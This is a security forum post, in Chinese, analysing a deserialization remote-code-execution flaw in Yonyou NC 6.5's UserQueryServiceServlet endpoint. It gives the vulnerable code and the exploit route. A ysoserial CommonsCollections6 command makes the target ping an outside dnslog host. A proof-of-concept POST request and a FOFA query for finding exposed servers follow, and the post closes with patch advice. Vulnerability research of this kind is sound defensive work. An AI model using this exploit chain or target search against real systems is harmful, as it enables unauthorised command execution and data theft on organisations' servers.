奇安信攻防社区-用友NC UserQueryServiceServlet反序列化漏洞分析

用友NC UserQueryServiceServlet反序列化漏洞分析

用友NC系统UserQueryServiceServlet方法存在反序列化漏洞，攻击者可执行任意命令，获取敏感信息

一、漏洞简介
------

用友NC系统`UserQueryServiceServlet`方法存在反序列化漏洞，攻击者可执行任意命令，获取敏感信息。

二、影响版本
------

用友NC6.5

三、漏洞原理分析
--------

漏洞位于`UserQueryServiceServlet`接口处，在包名称为`uapim`的目录下

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-8e9fbf780fd9afbf2eb8c2cc16cddbc2f2445e3e.png)

文件路径为`nc.bs.pub.im.UserQueryServiceServlet`

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-66f791e94769b9b73150ef9b511826b8784a1df6.png)

关键代码如下

```php
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {  
ObjectInputStream in = new ObjectInputStream((InputStream)request.getInputStream());  
HashMap<Object, Object> params = new HashMap<>();  
ObjectOutputStream oos = new ObjectOutputStream((OutputStream)response.getOutputStream());  
HashMap<Object, Object> result = new HashMap<>();  
try {  
  params = (HashMap<Object, Object>)in.readObject();
```

此次POST请求时，读取了输入流，之后对输入流方法进行`in.readObject()`造成了反序列化漏洞

来到具体的请求URL上面，要调用`UserQueryServiceServlet`类，只要在请求路由加上`/~包名称`+`UserQueryServiceServlet`类的完整路径即可

查看系统的`Web.xml`，可以看见请求`/service`和`/servlet`前缀的都经过`NCInvokerServlet`方法处理

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-98dac0091ac31364fbaf5df501bf38c2c42797b4.png)

`NCInvokerServlet`方法主要功能是获得url路径后，如果是以`/~`开头，截取第一部分为`moduleName`，然后再截取第二部分为`serviceName`，再根据`getServiceObject(moduleName, serviceName)`实现任意Servlet的调用。

这里包名称是`uapim`，再加上方法的完整路径就能进行请求了

回到漏洞，这里测试使用`ysoserial-all.jar`生成`cc6`的利用链请求dnslog，保存到本地的c.bin文件中

```php
java -jar ysoserial-all.jar CommonsCollections6 "ping xxe.jagvy1.dnslog.cn" > c.bin
```

再读取c.bin文件请求即可

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-6ce4c1bcf0f65d764e1451478c24cd50ff5c1d15.png)

接收到请求记录

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-a2bc7f5c142569c8dcba40f4574bf3c25945062f.png)

四、总结
----

用友NC系统`UserQueryServiceServlet`接口的方法中直接解析输入流造成了反序列化漏洞，攻击者可以构造执行任意的命令。

五、资产测绘
------

FOFA语法

```php
app="用友-UFIDA-NC"
```

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-25ad054ba770302b0ff4a7c6d1202cd0ba99d078.png)

六、漏洞复现
------

POC

```php
POST /servlet/~uapim/nc.bs.pub.im.UserQueryServiceServlet HTTP/1.1
Host: 
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

反序列化POC
```

这里用`ysoserial-all.jar`生成`cc6`的利用链请求dnslog，保存到本地的c.bin文件中

```php
java -jar ysoserial-all.jar CommonsCollections6 "ping xxe.jagvy1.dnslog.cn" > c.bin
```

再读取c.bin文件请求即可

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-6ce4c1bcf0f65d764e1451478c24cd50ff5c1d15.png)

接收到请求记录

![image.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/06/attach-a2bc7f5c142569c8dcba40f4574bf3c25945062f.png)

七、修复建议
------

安装用友NC最新的补丁并更新到最新版本，对接口添加身份信息验证并修改对应的方法逻辑。

发表于 2025-06-25 09:00:01
阅读 ( 170 )
分类：OA产品

用友NC UserQueryServiceServlet反序列化漏洞分析

0 条评论